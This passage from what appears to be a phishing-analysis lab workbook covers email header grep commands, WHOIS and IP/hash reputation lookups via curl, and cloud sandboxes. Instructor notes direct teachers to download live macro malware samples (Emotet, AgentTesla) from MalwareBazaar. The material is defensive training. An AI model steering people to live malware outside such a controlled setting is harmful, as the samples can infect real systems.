grep -i "spf\|dkim\|dmarc" email.eml         # Authentication results
grep -i "^From:\|Reply-To:\|Return-Path:" email.eml
grep -oE '[0-9]{1,3}(\.[0-9]{1,3}){3}' email.eml | sort -u   # All IPs

# Also paste full headers into these web tools:
# mxtoolbox.com/EmailHeaders
# toolbox.googleapps.com/apps/messageheader

🔗 Link & Domain Analysis

# Terminal WHOIS — domain registration date is key
whois suspicious-domain.com
whois 185.220.101.12                          # IP WHOIS

# Check Tor exit node list
curl -s "https://check.torproject.org/torbulkexitlist" | grep "IP_ADDRESS"

# Web tools — use in VM browser, paste URL — do NOT click
# urlscan.io           — redirect chain + screenshot of final page
# virustotal.com       — URL + file reputation + community scores
# whois.domaintools.com — full domain history

🔍 IP & Hash Reputation (API from Terminal)

# AbuseIPDB — check IP abuse score (free API key required)
curl -s "https://api.abuseipdb.com/api/v2/check?ipAddress=IP_HERE" \
  -H "Key: YOUR_KEY" \
  -H "Accept: application/json" | python3 -m json.tool

# ThreatFox — search IOC database (hashes, IPs, domains)
curl -s -X POST https://threatfox-api.abuse.ch/api/v1/ \
  -d '{"query":"search_ioc","search_term":"185.220.101.47"}' \
  | python3 -m json.tool

# VirusTotal file hash lookup (free API key required)
curl -s "https://www.virustotal.com/api/v3/files/SHA256_HERE" \
  -H "x-apikey: YOUR_VT_KEY" | python3 -m json.tool | grep -i "malicious\|verdict"

💣 Sandbox Detonation

# Cloud sandboxes — use in VM browser, upload file there
# any.run              — interactive live session, best for beginners
# hybrid-analysis.com  — automated deep report, free tier
# joesandbox.com       — advanced behavioural analysis
# app.any.run/tasks    — view public community detonation reports

# Local option: CAPEv2 (Cuckoo fork) runs entirely on Linux
# See: github.com/kevoreilly/CAPEv2

Instructor Notes

Recommended VM distro: REMnux saves 30–45 minutes of setup time — ExifTool, oletools, and Cuckoo support are pre-installed. Provide students with a pre-built REMnux OVA if possible.
Lab 4 samples: Search MalwareBazaar with tags VBA, Emotet, or AgentTesla — hundreds of confirmed macro-laden .docx files are available via the free API. Test downloads before class and note the SHA256 hashes to hand to students who have trouble with the API.
Lab 5 .eml files: The synthetic .eml script in this workbook is the safest option. For more advanced classes, set up a local Postfix mail server inside the VM so students can send and receive real emails with crafted headers.
Lab 6: PhishTool's free tier lets you import real .eml files and automatically extracts headers, links, and attachments — useful as a comparison to the manual Linux commands.
Guided platform: LetsDefend.io has a dedicated Email Analysis learning path with 15+ real alert scenarios graded by an automated SOC scoring system. Assign it as supplemental homework after Lab 5.
TryHackMe: The Phishing Emails rooms (1–5) work entirely inside a browser and can be completed from within the Linux VM — good for students who want to go further.
IOC notebook: Encourage students to keep a personal ioc_log.csv in their VM across all labs — recording hash, domain, IP, and source for every IOC they find. This becomes a useful personal threat intel reference.

Protected Workbook

Workbook Closed